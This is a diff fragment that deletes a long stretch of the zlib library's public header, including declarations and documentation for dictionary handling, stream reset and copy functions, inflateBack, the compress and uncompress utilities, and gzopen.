-     The strategy parameter is used to tune the compression algorithm.  Use the
-   value Z_DEFAULT_STRATEGY for normal data, Z_FILTERED for data produced by a
-   filter (or predictor), Z_HUFFMAN_ONLY to force Huffman encoding only (no
-   string match), or Z_RLE to limit match distances to one (run-length
-   encoding).  Filtered data consists mostly of small values with a somewhat
-   random distribution.  In this case, the compression algorithm is tuned to
-   compress them better.  The effect of Z_FILTERED is to force more Huffman
-   coding and less string matching; it is somewhat intermediate between
-   Z_DEFAULT_STRATEGY and Z_HUFFMAN_ONLY.  Z_RLE is designed to be almost as
-   fast as Z_HUFFMAN_ONLY, but give better compression for PNG image data.  The
-   strategy parameter only affects the compression ratio but not the
-   correctness of the compressed output even if it is not set appropriately.
-   Z_FIXED prevents the use of dynamic Huffman codes, allowing for a simpler
-   decoder for special applications.
-
-     deflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_STREAM_ERROR if any parameter is invalid (such as an invalid
-   method), or Z_VERSION_ERROR if the zlib library version (zlib_version) is
-   incompatible with the version assumed by the caller (ZLIB_VERSION).  msg is
-   set to null if there is no error message.  deflateInit2 does not perform any
-   compression: this will be done by deflate().
-*/
-
-ZEXTERN int ZEXPORT deflateSetDictionary OF((z_streamp strm,
-                                             const Bytef *dictionary,
-                                             uInt  dictLength));
-/*
-     Initializes the compression dictionary from the given byte sequence
-   without producing any compressed output.  When using the zlib format, this
-   function must be called immediately after deflateInit, deflateInit2 or
-   deflateReset, and before any call of deflate.  When doing raw deflate, this
-   function must be called either before any call of deflate, or immediately
-   after the completion of a deflate block, i.e. after all input has been
-   consumed and all output has been delivered when using any of the flush
-   options Z_BLOCK, Z_PARTIAL_FLUSH, Z_SYNC_FLUSH, or Z_FULL_FLUSH.  The
-   compressor and decompressor must use exactly the same dictionary (see
-   inflateSetDictionary).
-
-     The dictionary should consist of strings (byte sequences) that are likely
-   to be encountered later in the data to be compressed, with the most commonly
-   used strings preferably put towards the end of the dictionary.  Using a
-   dictionary is most useful when the data to be compressed is short and can be
-   predicted with good accuracy; the data can then be compressed better than
-   with the default empty dictionary.
-
-     Depending on the size of the compression data structures selected by
-   deflateInit or deflateInit2, a part of the dictionary may in effect be
-   discarded, for example if the dictionary is larger than the window size
-   provided in deflateInit or deflateInit2.  Thus the strings most likely to be
-   useful should be put at the end of the dictionary, not at the front.  In
-   addition, the current implementation of deflate will use at most the window
-   size minus 262 bytes of the provided dictionary.
-
-     Upon return of this function, strm->adler is set to the Adler-32 value
-   of the dictionary; the decompressor may later use this value to determine
-   which dictionary has been used by the compressor.  (The Adler-32 value
-   applies to the whole dictionary even if only a subset of the dictionary is
-   actually used by the compressor.) If a raw deflate was requested, then the
-   Adler-32 value is not computed and strm->adler is not set.
-
-     deflateSetDictionary returns Z_OK if success, or Z_STREAM_ERROR if a
-   parameter is invalid (e.g.  dictionary being Z_NULL) or the stream state is
-   inconsistent (for example if deflate has already been called for this stream
-   or if not at a block boundary for raw deflate).  deflateSetDictionary does
-   not perform any compression: this will be done by deflate().
-*/
-
-ZEXTERN int ZEXPORT deflateGetDictionary OF((z_streamp strm,
-                                             Bytef *dictionary,
-                                             uInt  *dictLength));
-/*
-     Returns the sliding dictionary being maintained by deflate.  dictLength is
-   set to the number of bytes in the dictionary, and that many bytes are copied
-   to dictionary.  dictionary must have enough space, where 32768 bytes is
-   always enough.  If deflateGetDictionary() is called with dictionary equal to
-   Z_NULL, then only the dictionary length is returned, and nothing is copied.
-   Similary, if dictLength is Z_NULL, then it is not set.
-
-     deflateGetDictionary() may return a length less than the window size, even
-   when more than the window size in input has been provided. It may return up
-   to 258 bytes less in that case, due to how zlib's implementation of deflate
-   manages the sliding window and lookahead for matches, where matches can be
-   up to 258 bytes long. If the application needs the last window-size bytes of
-   input, then that would need to be saved by the application outside of zlib.
-
-     deflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the
-   stream state is inconsistent.
-*/
-
-ZEXTERN int ZEXPORT deflateCopy OF((z_streamp dest,
-                                    z_streamp source));
-/*
-     Sets the destination stream as a complete copy of the source stream.
-
-     This function can be useful when several compression strategies will be
-   tried, for example when there are several ways of pre-processing the input
-   data with a filter.  The streams that will be discarded should then be freed
-   by calling deflateEnd.  Note that deflateCopy duplicates the internal
-   compression state which can be quite large, so this strategy is slow and can
-   consume lots of memory.
-
-     deflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_STREAM_ERROR if the source stream state was inconsistent
-   (such as zalloc being Z_NULL).  msg is left unchanged in both source and
-   destination.
-*/
-
-ZEXTERN int ZEXPORT deflateReset OF((z_streamp strm));
-/*
-     This function is equivalent to deflateEnd followed by deflateInit, but
-   does not free and reallocate the internal compression state.  The stream
-   will leave the compression level and any other attributes that may have been
-   set unchanged.
-
-     deflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL).
-*/
-
-ZEXTERN int ZEXPORT deflateParams OF((z_streamp strm,
-                                      int level,
-                                      int strategy));
-/*
-     Dynamically update the compression level and compression strategy.  The
-   interpretation of level and strategy is as in deflateInit2().  This can be
-   used to switch between compression and straight copy of the input data, or
-   to switch to a different kind of input data requiring a different strategy.
-   If the compression approach (which is a function of the level) or the
-   strategy is changed, and if any input has been consumed in a previous
-   deflate() call, then the input available so far is compressed with the old
-   level and strategy using deflate(strm, Z_BLOCK).  There are three approaches
-   for the compression levels 0, 1..3, and 4..9 respectively.  The new level
-   and strategy will take effect at the next call of deflate().
-
-     If a deflate(strm, Z_BLOCK) is performed by deflateParams(), and it does
-   not have enough output space to complete, then the parameter change will not
-   take effect.  In this case, deflateParams() can be called again with the
-   same parameters and more output space to try again.
-
-     In order to assure a change in the parameters on the first try, the
-   deflate stream should be flushed using deflate() with Z_BLOCK or other flush
-   request until strm.avail_out is not zero, before calling deflateParams().
-   Then no more input data should be provided before the deflateParams() call.
-   If this is done, the old level and strategy will be applied to the data
-   compressed before deflateParams(), and the new level and strategy will be
-   applied to the the data compressed after deflateParams().
-
-     deflateParams returns Z_OK on success, Z_STREAM_ERROR if the source stream
-   state was inconsistent or if a parameter was invalid, or Z_BUF_ERROR if
-   there was not enough output space to complete the compression of the
-   available input data before a change in the strategy or approach.  Note that
-   in the case of a Z_BUF_ERROR, the parameters are not changed.  A return
-   value of Z_BUF_ERROR is not fatal, in which case deflateParams() can be
-   retried with more output space.
-*/
-
-ZEXTERN int ZEXPORT deflateTune OF((z_streamp strm,
-                                    int good_length,
-                                    int max_lazy,
-                                    int nice_length,
-                                    int max_chain));
-/*
-     Fine tune deflate's internal compression parameters.  This should only be
-   used by someone who understands the algorithm used by zlib's deflate for
-   searching for the best matching string, and even then only by the most
-   fanatic optimizer trying to squeeze out the last compressed bit for their
-   specific input data.  Read the deflate.c source code for the meaning of the
-   max_lazy, good_length, nice_length, and max_chain parameters.
-
-     deflateTune() can be called after deflateInit() or deflateInit2(), and
-   returns Z_OK on success, or Z_STREAM_ERROR for an invalid deflate stream.
- */
-
-ZEXTERN uLong ZEXPORT deflateBound OF((z_streamp strm,
-                                       uLong sourceLen));
-/*
-     deflateBound() returns an upper bound on the compressed size after
-   deflation of sourceLen bytes.  It must be called after deflateInit() or
-   deflateInit2(), and after deflateSetHeader(), if used.  This would be used
-   to allocate an output buffer for deflation in a single pass, and so would be
-   called before deflate().  If that first deflate() call is provided the
-   sourceLen input bytes, an output buffer allocated to the size returned by
-   deflateBound(), and the flush value Z_FINISH, then deflate() is guaranteed
-   to return Z_STREAM_END.  Note that it is possible for the compressed size to
-   be larger than the value returned by deflateBound() if flush options other
-   than Z_FINISH or Z_NO_FLUSH are used.
-*/
-
-ZEXTERN int ZEXPORT deflatePending OF((z_streamp strm,
-                                       unsigned *pending,
-                                       int *bits));
-/*
-     deflatePending() returns the number of bytes and bits of output that have
-   been generated, but not yet provided in the available output.  The bytes not
-   provided would be due to the available output space having being consumed.
-   The number of bits of output not provided are between 0 and 7, where they
-   await more bits to join them in order to fill out a full byte.  If pending
-   or bits are Z_NULL, then those values are not set.
-
-     deflatePending returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
- */
-
-ZEXTERN int ZEXPORT deflatePrime OF((z_streamp strm,
-                                     int bits,
-                                     int value));
-/*
-     deflatePrime() inserts bits in the deflate output stream.  The intent
-   is that this function is used to start off the deflate output with the bits
-   leftover from a previous deflate stream when appending to it.  As such, this
-   function can only be used for raw deflate, and must be used before the first
-   deflate() call after a deflateInit2() or deflateReset().  bits must be less
-   than or equal to 16, and that many of the least significant bits of value
-   will be inserted in the output.
-
-     deflatePrime returns Z_OK if success, Z_BUF_ERROR if there was not enough
-   room in the internal buffer to insert the bits, or Z_STREAM_ERROR if the
-   source stream state was inconsistent.
-*/
-
-ZEXTERN int ZEXPORT deflateSetHeader OF((z_streamp strm,
-                                         gz_headerp head));
-/*
-     deflateSetHeader() provides gzip header information for when a gzip
-   stream is requested by deflateInit2().  deflateSetHeader() may be called
-   after deflateInit2() or deflateReset() and before the first call of
-   deflate().  The text, time, os, extra field, name, and comment information
-   in the provided gz_header structure are written to the gzip header (xflag is
-   ignored -- the extra flags are set according to the compression level).  The
-   caller must assure that, if not Z_NULL, name and comment are terminated with
-   a zero byte, and that if extra is not Z_NULL, that extra_len bytes are
-   available there.  If hcrc is true, a gzip header crc is included.  Note that
-   the current versions of the command-line version of gzip (up through version
-   1.3.x) do not support header crc's, and will report that it is a "multi-part
-   gzip file" and give up.
-
-     If deflateSetHeader is not used, the default gzip header has text false,
-   the time set to zero, and os set to 255, with no extra, name, or comment
-   fields.  The gzip header is returned to the default state by deflateReset().
-
-     deflateSetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-/*
-ZEXTERN int ZEXPORT inflateInit2 OF((z_streamp strm,
-                                     int  windowBits));
-
-     This is another version of inflateInit with an extra parameter.  The
-   fields next_in, avail_in, zalloc, zfree and opaque must be initialized
-   before by the caller.
-
-     The windowBits parameter is the base two logarithm of the maximum window
-   size (the size of the history buffer).  It should be in the range 8..15 for
-   this version of the library.  The default value is 15 if inflateInit is used
-   instead.  windowBits must be greater than or equal to the windowBits value
-   provided to deflateInit2() while compressing, or it must be equal to 15 if
-   deflateInit2() was not used.  If a compressed stream with a larger window
-   size is given as input, inflate() will return with the error code
-   Z_DATA_ERROR instead of trying to allocate a larger window.
-
-     windowBits can also be zero to request that inflate use the window size in
-   the zlib header of the compressed stream.
-
-     windowBits can also be -8..-15 for raw inflate.  In this case, -windowBits
-   determines the window size.  inflate() will then process raw deflate data,
-   not looking for a zlib or gzip header, not generating a check value, and not
-   looking for any check values for comparison at the end of the stream.  This
-   is for use with other formats that use the deflate compressed data format
-   such as zip.  Those formats provide their own check values.  If a custom
-   format is developed using the raw deflate format for compressed data, it is
-   recommended that a check value such as an Adler-32 or a CRC-32 be applied to
-   the uncompressed data as is done in the zlib, gzip, and zip formats.  For
-   most applications, the zlib format should be used as is.  Note that comments
-   above on the use in deflateInit2() applies to the magnitude of windowBits.
-
-     windowBits can also be greater than 15 for optional gzip decoding.  Add
-   32 to windowBits to enable zlib and gzip decoding with automatic header
-   detection, or add 16 to decode only the gzip format (the zlib format will
-   return a Z_DATA_ERROR).  If a gzip stream is being decoded, strm->adler is a
-   CRC-32 instead of an Adler-32.  Unlike the gunzip utility and gzread() (see
-   below), inflate() will not automatically decode concatenated gzip streams.
-   inflate() will return Z_STREAM_END at the end of the gzip stream.  The state
-   would need to be reset to continue decoding a subsequent gzip stream.
-
-     inflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_VERSION_ERROR if the zlib library version is incompatible with the
-   version assumed by the caller, or Z_STREAM_ERROR if the parameters are
-   invalid, such as a null pointer to the structure.  msg is set to null if
-   there is no error message.  inflateInit2 does not perform any decompression
-   apart from possibly reading the zlib header if present: actual decompression
-   will be done by inflate().  (So next_in and avail_in may be modified, but
-   next_out and avail_out are unused and unchanged.) The current implementation
-   of inflateInit2() does not process any header information -- that is
-   deferred until inflate() is called.
-*/
-
-ZEXTERN int ZEXPORT inflateSetDictionary OF((z_streamp strm,
-                                             const Bytef *dictionary,
-                                             uInt  dictLength));
-/*
-     Initializes the decompression dictionary from the given uncompressed byte
-   sequence.  This function must be called immediately after a call of inflate,
-   if that call returned Z_NEED_DICT.  The dictionary chosen by the compressor
-   can be determined from the Adler-32 value returned by that call of inflate.
-   The compressor and decompressor must use exactly the same dictionary (see
-   deflateSetDictionary).  For raw inflate, this function can be called at any
-   time to set the dictionary.  If the provided dictionary is smaller than the
-   window and there is already data in the window, then the provided dictionary
-   will amend what's there.  The application must insure that the dictionary
-   that was used for compression is provided.
-
-     inflateSetDictionary returns Z_OK if success, Z_STREAM_ERROR if a
-   parameter is invalid (e.g.  dictionary being Z_NULL) or the stream state is
-   inconsistent, Z_DATA_ERROR if the given dictionary doesn't match the
-   expected one (incorrect Adler-32 value).  inflateSetDictionary does not
-   perform any decompression: this will be done by subsequent calls of
-   inflate().
-*/
-
-ZEXTERN int ZEXPORT inflateGetDictionary OF((z_streamp strm,
-                                             Bytef *dictionary,
-                                             uInt  *dictLength));
-/*
-     Returns the sliding dictionary being maintained by inflate.  dictLength is
-   set to the number of bytes in the dictionary, and that many bytes are copied
-   to dictionary.  dictionary must have enough space, where 32768 bytes is
-   always enough.  If inflateGetDictionary() is called with dictionary equal to
-   Z_NULL, then only the dictionary length is returned, and nothing is copied.
-   Similary, if dictLength is Z_NULL, then it is not set.
-
-     inflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the
-   stream state is inconsistent.
-*/
-
-ZEXTERN int ZEXPORT inflateSync OF((z_streamp strm));
-/*
-     Skips invalid compressed data until a possible full flush point (see above
-   for the description of deflate with Z_FULL_FLUSH) can be found, or until all
-   available input is skipped.  No output is provided.
-
-     inflateSync searches for a 00 00 FF FF pattern in the compressed data.
-   All full flush points have this pattern, but not all occurrences of this
-   pattern are full flush points.
-
-     inflateSync returns Z_OK if a possible full flush point has been found,
-   Z_BUF_ERROR if no more input was provided, Z_DATA_ERROR if no flush point
-   has been found, or Z_STREAM_ERROR if the stream structure was inconsistent.
-   In the success case, the application may save the current current value of
-   total_in which indicates where valid compressed data was found.  In the
-   error case, the application may repeatedly call inflateSync, providing more
-   input each time, until success or end of the input data.
-*/
-
-ZEXTERN int ZEXPORT inflateCopy OF((z_streamp dest,
-                                    z_streamp source));
-/*
-     Sets the destination stream as a complete copy of the source stream.
-
-     This function can be useful when randomly accessing a large stream.  The
-   first pass through the stream can periodically record the inflate state,
-   allowing restarting inflate at those points when randomly accessing the
-   stream.
-
-     inflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_STREAM_ERROR if the source stream state was inconsistent
-   (such as zalloc being Z_NULL).  msg is left unchanged in both source and
-   destination.
-*/
-
-ZEXTERN int ZEXPORT inflateReset OF((z_streamp strm));
-/*
-     This function is equivalent to inflateEnd followed by inflateInit,
-   but does not free and reallocate the internal decompression state.  The
-   stream will keep attributes that may have been set by inflateInit2.
-
-     inflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL).
-*/
-
-ZEXTERN int ZEXPORT inflateReset2 OF((z_streamp strm,
-                                      int windowBits));
-/*
-     This function is the same as inflateReset, but it also permits changing
-   the wrap and window size requests.  The windowBits parameter is interpreted
-   the same as it is for inflateInit2.  If the window size is changed, then the
-   memory allocated for the window is freed, and the window will be reallocated
-   by inflate() if needed.
-
-     inflateReset2 returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL), or if
-   the windowBits parameter is invalid.
-*/
-
-ZEXTERN int ZEXPORT inflatePrime OF((z_streamp strm,
-                                     int bits,
-                                     int value));
-/*
-     This function inserts bits in the inflate input stream.  The intent is
-   that this function is used to start inflating at a bit position in the
-   middle of a byte.  The provided bits will be used before any bytes are used
-   from next_in.  This function should only be used with raw inflate, and
-   should be used before the first inflate() call after inflateInit2() or
-   inflateReset().  bits must be less than or equal to 16, and that many of the
-   least significant bits of value will be inserted in the input.
-
-     If bits is negative, then the input stream bit buffer is emptied.  Then
-   inflatePrime() can be called again to put bits in the buffer.  This is used
-   to clear out bits leftover after feeding inflate a block description prior
-   to feeding inflate codes.
-
-     inflatePrime returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-ZEXTERN long ZEXPORT inflateMark OF((z_streamp strm));
-/*
-     This function returns two values, one in the lower 16 bits of the return
-   value, and the other in the remaining upper bits, obtained by shifting the
-   return value down 16 bits.  If the upper value is -1 and the lower value is
-   zero, then inflate() is currently decoding information outside of a block.
-   If the upper value is -1 and the lower value is non-zero, then inflate is in
-   the middle of a stored block, with the lower value equaling the number of
-   bytes from the input remaining to copy.  If the upper value is not -1, then
-   it is the number of bits back from the current bit position in the input of
-   the code (literal or length/distance pair) currently being processed.  In
-   that case the lower value is the number of bytes already emitted for that
-   code.
-
-     A code is being processed if inflate is waiting for more input to complete
-   decoding of the code, or if it has completed decoding but is waiting for
-   more output space to write the literal or match data.
-
-     inflateMark() is used to mark locations in the input data for random
-   access, which may be at bit positions, and to note those cases where the
-   output of a code may span boundaries of random access blocks.  The current
-   location in the input stream can be determined from avail_in and data_type
-   as noted in the description for the Z_BLOCK flush parameter for inflate.
-
-     inflateMark returns the value noted above, or -65536 if the provided
-   source stream state was inconsistent.
-*/
-
-ZEXTERN int ZEXPORT inflateGetHeader OF((z_streamp strm,
-                                         gz_headerp head));
-/*
-     inflateGetHeader() requests that gzip header information be stored in the
-   provided gz_header structure.  inflateGetHeader() may be called after
-   inflateInit2() or inflateReset(), and before the first call of inflate().
-   As inflate() processes the gzip stream, head->done is zero until the header
-   is completed, at which time head->done is set to one.  If a zlib stream is
-   being decoded, then head->done is set to -1 to indicate that there will be
-   no gzip header information forthcoming.  Note that Z_BLOCK or Z_TREES can be
-   used to force inflate() to return immediately after header processing is
-   complete and before any actual data is decompressed.
-
-     The text, time, xflags, and os fields are filled in with the gzip header
-   contents.  hcrc is set to true if there is a header CRC.  (The header CRC
-   was valid if done is set to one.) If extra is not Z_NULL, then extra_max
-   contains the maximum number of bytes to write to extra.  Once done is true,
-   extra_len contains the actual extra field length, and extra contains the
-   extra field, or that field truncated if extra_max is less than extra_len.
-   If name is not Z_NULL, then up to name_max characters are written there,
-   terminated with a zero unless the length is greater than name_max.  If
-   comment is not Z_NULL, then up to comm_max characters are written there,
-   terminated with a zero unless the length is greater than comm_max.  When any
-   of extra, name, or comment are not Z_NULL and the respective field is not
-   present in the header, then that field is set to Z_NULL to signal its
-   absence.  This allows the use of deflateSetHeader() with the returned
-   structure to duplicate the header.  However if those fields are set to
-   allocated memory, then the application will need to save those pointers
-   elsewhere so that they can be eventually freed.
-
-     If inflateGetHeader is not used, then the header information is simply
-   discarded.  The header is always checked for validity, including the header
-   CRC if present.  inflateReset() will reset the process to discard the header
-   information.  The application would need to call inflateGetHeader() again to
-   retrieve the header from the next gzip stream.
-
-     inflateGetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-/*
-ZEXTERN int ZEXPORT inflateBackInit OF((z_streamp strm, int windowBits,
-                                        unsigned char FAR *window));
-
-     Initialize the internal stream state for decompression using inflateBack()
-   calls.  The fields zalloc, zfree and opaque in strm must be initialized
-   before the call.  If zalloc and zfree are Z_NULL, then the default library-
-   derived memory allocation routines are used.  windowBits is the base two
-   logarithm of the window size, in the range 8..15.  window is a caller
-   supplied buffer of that size.  Except for special applications where it is
-   assured that deflate was used with small window sizes, windowBits must be 15
-   and a 32K byte window must be supplied to be able to decompress general
-   deflate streams.
-
-     See inflateBack() for the usage of these routines.
-
-     inflateBackInit will return Z_OK on success, Z_STREAM_ERROR if any of
-   the parameters are invalid, Z_MEM_ERROR if the internal state could not be
-   allocated, or Z_VERSION_ERROR if the version of the library does not match
-   the version of the header file.
-*/
-
-typedef unsigned (*in_func) OF((void FAR *,
-                                z_const unsigned char FAR * FAR *));
-typedef int (*out_func) OF((void FAR *, unsigned char FAR *, unsigned));
-
-ZEXTERN int ZEXPORT inflateBack OF((z_streamp strm,
-                                    in_func in, void FAR *in_desc,
-                                    out_func out, void FAR *out_desc));
-/*
-     inflateBack() does a raw inflate with a single call using a call-back
-   interface for input and output.  This is potentially more efficient than
-   inflate() for file i/o applications, in that it avoids copying between the
-   output and the sliding window by simply making the window itself the output
-   buffer.  inflate() can be faster on modern CPUs when used with large
-   buffers.  inflateBack() trusts the application to not change the output
-   buffer passed by the output function, at least until inflateBack() returns.
-
-     inflateBackInit() must be called first to allocate the internal state
-   and to initialize the state with the user-provided window buffer.
-   inflateBack() may then be used multiple times to inflate a complete, raw
-   deflate stream with each call.  inflateBackEnd() is then called to free the
-   allocated state.
-
-     A raw deflate stream is one with no zlib or gzip header or trailer.
-   This routine would normally be used in a utility that reads zip or gzip
-   files and writes out uncompressed files.  The utility would decode the
-   header and process the trailer on its own, hence this routine expects only
-   the raw deflate stream to decompress.  This is different from the default
-   behavior of inflate(), which expects a zlib header and trailer around the
-   deflate stream.
-
-     inflateBack() uses two subroutines supplied by the caller that are then
-   called by inflateBack() for input and output.  inflateBack() calls those
-   routines until it reads a complete deflate stream and writes out all of the
-   uncompressed data, or until it encounters an error.  The function's
-   parameters and return types are defined above in the in_func and out_func
-   typedefs.  inflateBack() will call in(in_desc, &buf) which should return the
-   number of bytes of provided input, and a pointer to that input in buf.  If
-   there is no input available, in() must return zero -- buf is ignored in that
-   case -- and inflateBack() will return a buffer error.  inflateBack() will
-   call out(out_desc, buf, len) to write the uncompressed data buf[0..len-1].
-   out() should return zero on success, or non-zero on failure.  If out()
-   returns non-zero, inflateBack() will return with an error.  Neither in() nor
-   out() are permitted to change the contents of the window provided to
-   inflateBackInit(), which is also the buffer that out() uses to write from.
-   The length written by out() will be at most the window size.  Any non-zero
-   amount of input may be provided by in().
-
-     For convenience, inflateBack() can be provided input on the first call by
-   setting strm->next_in and strm->avail_in.  If that input is exhausted, then
-   in() will be called.  Therefore strm->next_in must be initialized before
-   calling inflateBack().  If strm->next_in is Z_NULL, then in() will be called
-   immediately for input.  If strm->next_in is not Z_NULL, then strm->avail_in
-   must also be initialized, and then if strm->avail_in is not zero, input will
-   initially be taken from strm->next_in[0 ..  strm->avail_in - 1].
-
-     The in_desc and out_desc parameters of inflateBack() is passed as the
-   first parameter of in() and out() respectively when they are called.  These
-   descriptors can be optionally used to pass any information that the caller-
-   supplied in() and out() functions need to do their job.
-
-     On return, inflateBack() will set strm->next_in and strm->avail_in to
-   pass back any unused input that was provided by the last in() call.  The
-   return values of inflateBack() can be Z_STREAM_END on success, Z_BUF_ERROR
-   if in() or out() returned an error, Z_DATA_ERROR if there was a format error
-   in the deflate stream (in which case strm->msg is set to indicate the nature
-   of the error), or Z_STREAM_ERROR if the stream was not properly initialized.
-   In the case of Z_BUF_ERROR, an input or output error can be distinguished
-   using strm->next_in which will be Z_NULL only if in() returned an error.  If
-   strm->next_in is not Z_NULL, then the Z_BUF_ERROR was due to out() returning
-   non-zero.  (in() will always be called before out(), so strm->next_in is
-   assured to be defined if out() returns non-zero.)  Note that inflateBack()
-   cannot return Z_OK.
-*/
-
-ZEXTERN int ZEXPORT inflateBackEnd OF((z_streamp strm));
-/*
-     All memory allocated by inflateBackInit() is freed.
-
-     inflateBackEnd() returns Z_OK on success, or Z_STREAM_ERROR if the stream
-   state was inconsistent.
-*/
-
-ZEXTERN uLong ZEXPORT zlibCompileFlags OF((void));
-/* Return flags indicating compile-time options.
-
-    Type sizes, two bits each, 00 = 16 bits, 01 = 32, 10 = 64, 11 = other:
-     1.0: size of uInt
-     3.2: size of uLong
-     5.4: size of voidpf (pointer)
-     7.6: size of z_off_t
-
-    Compiler, assembler, and debug options:
-     8: ZLIB_DEBUG
-     9: ASMV or ASMINF -- use ASM code
-     10: ZLIB_WINAPI -- exported functions use the WINAPI calling convention
-     11: 0 (reserved)
-
-    One-time table building (smaller code, but not thread-safe if true):
-     12: BUILDFIXED -- build static block decoding tables when needed
-     13: DYNAMIC_CRC_TABLE -- build CRC calculation tables when needed
-     14,15: 0 (reserved)
-
-    Library content (indicates missing functionality):
-     16: NO_GZCOMPRESS -- gz* functions cannot compress (to avoid linking
-                          deflate code when not needed)
-     17: NO_GZIP -- deflate can't write gzip streams, and inflate can't detect
-                    and decode gzip streams (to avoid linking crc code)
-     18-19: 0 (reserved)
-
-    Operation variations (changes in library functionality):
-     20: PKZIP_BUG_WORKAROUND -- slightly more permissive inflate
-     21: FASTEST -- deflate algorithm with only one, lowest compression level
-     22,23: 0 (reserved)
-
-    The sprintf variant used by gzprintf (zero is best):
-     24: 0 = vs*, 1 = s* -- 1 means limited to 20 arguments after the format
-     25: 0 = *nprintf, 1 = *printf -- 1 means gzprintf() not secure!
-     26: 0 = returns value, 1 = void -- 1 means inferred string length returned
-
-    Remainder:
-     27-31: 0 (reserved)
- */
-
-#ifndef Z_SOLO
-
-                        /* utility functions */
-
-/*
-     The following utility functions are implemented on top of the basic
-   stream-oriented functions.  To simplify the interface, some default options
-   are assumed (compression level and memory usage, standard memory allocation
-   functions).  The source code of these utility functions can be modified if
-   you need special options.
-*/
-
-ZEXTERN int ZEXPORT compress OF((Bytef *dest,   uLongf *destLen,
-                                 const Bytef *source, uLong sourceLen));
-/*
-     Compresses the source buffer into the destination buffer.  sourceLen is
-   the byte length of the source buffer.  Upon entry, destLen is the total size
-   of the destination buffer, which must be at least the value returned by
-   compressBound(sourceLen).  Upon exit, destLen is the actual size of the
-   compressed data.  compress() is equivalent to compress2() with a level
-   parameter of Z_DEFAULT_COMPRESSION.
-
-     compress returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_BUF_ERROR if there was not enough room in the output
-   buffer.
-*/
-
-ZEXTERN int ZEXPORT compress2 OF((Bytef *dest,   uLongf *destLen,
-                                  const Bytef *source, uLong sourceLen,
-                                  int level));
-/*
-     Compresses the source buffer into the destination buffer.  The level
-   parameter has the same meaning as in deflateInit.  sourceLen is the byte
-   length of the source buffer.  Upon entry, destLen is the total size of the
-   destination buffer, which must be at least the value returned by
-   compressBound(sourceLen).  Upon exit, destLen is the actual size of the
-   compressed data.
-
-     compress2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_BUF_ERROR if there was not enough room in the output buffer,
-   Z_STREAM_ERROR if the level parameter is invalid.
-*/
-
-ZEXTERN uLong ZEXPORT compressBound OF((uLong sourceLen));
-/*
-     compressBound() returns an upper bound on the compressed size after
-   compress() or compress2() on sourceLen bytes.  It would be used before a
-   compress() or compress2() call to allocate the destination buffer.
-*/
-
-ZEXTERN int ZEXPORT uncompress OF((Bytef *dest,   uLongf *destLen,
-                                   const Bytef *source, uLong sourceLen));
-/*
-     Decompresses the source buffer into the destination buffer.  sourceLen is
-   the byte length of the source buffer.  Upon entry, destLen is the total size
-   of the destination buffer, which must be large enough to hold the entire
-   uncompressed data.  (The size of the uncompressed data must have been saved
-   previously by the compressor and transmitted to the decompressor by some
-   mechanism outside the scope of this compression library.) Upon exit, destLen
-   is the actual size of the uncompressed data.
-
-     uncompress returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_BUF_ERROR if there was not enough room in the output
-   buffer, or Z_DATA_ERROR if the input data was corrupted or incomplete.  In
-   the case where there is not enough room, uncompress() will fill the output
-   buffer with the uncompressed data up to that point.
-*/
-
-ZEXTERN int ZEXPORT uncompress2 OF((Bytef *dest,   uLongf *destLen,
-                                    const Bytef *source, uLong *sourceLen));
-/*
-     Same as uncompress, except that sourceLen is a pointer, where the
-   length of the source is *sourceLen.  On return, *sourceLen is the number of
-   source bytes consumed.
-*/
-
-                        /* gzip file access functions */
-
-/*
-     This library supports reading and writing files in gzip (.gz) format with
-   an interface similar to that of stdio, using the functions that start with
-   "gz".  The gzip format is different from the zlib format.  gzip is a gzip
-   wrapper, documented in RFC 1952, wrapped around a deflate stream.
-*/
-
-typedef struct gzFile_s *gzFile;    /* semi-opaque gzip file descriptor */
-
-/*
-ZEXTERN gzFile ZEXPORT gzopen OF((const char *path, const char *mode));
-
-     Opens a gzip (.gz) file for reading or writing.  The mode parameter is as
-   in fopen ("rb" or "wb") but can also include a compression level ("wb9") or
-   a strategy: 'f' for filtered data as in "wb6f", 'h' for Huffman-only
-   compression as in "wb1h", 'R' for run-length encoding as in "wb1R", or 'F'
-   for fixed code compression as in "wb9F".  (See the description of
-   deflateInit2 for more information about the strategy parameter.)  'T' will
-   request transparent writing or appending with no compression and not using
-   the gzip format.
-
-     "a" can be used instead of "w" to request that the gzip stream that will
-   be written be appended to the file.  "+" will result in an error, since
-   reading and writing to the same gzip file is not supported.  The addition of
-   "x" when writing will create the file exclusively, which fails if the file
-   already exists.  On systems that support it, the addition of "e" when
-   reading or writing will set the flag to close the file on an execve() call.
-
-     These functions, as well as gzip, will read and decode a sequence of gzip
-   streams in a file.  The append function of gzopen() can be used to create
-   such a file.  (Also see gzflush() for another way to do this.)  When
-   appending, gzopen does not test whether the file begins with a gzip stream,
-   nor does it look for the end of the gzip streams to begin appending.  gzopen
-   will simply append a gzip stream to the existing file.
-
-     gzopen can be used to read a file which is not in gzip format; in this
-   case gzread will directly read from the file without decompression.  When
-   reading, this will be detected automatically by looking for the magic two-
-   byte gzip header.
-
-     gzopen returns NULL if the file could not be opened, if there was
-   insufficient memory to allocate the gzFile state, or if an invalid mode was
-   specified (an 'r', 'w', or 'a' was not provided, or '+' was provided).
-   errno can be checked to determine if the reason gzopen failed was that the
-   file could not be opened.
-*/
-
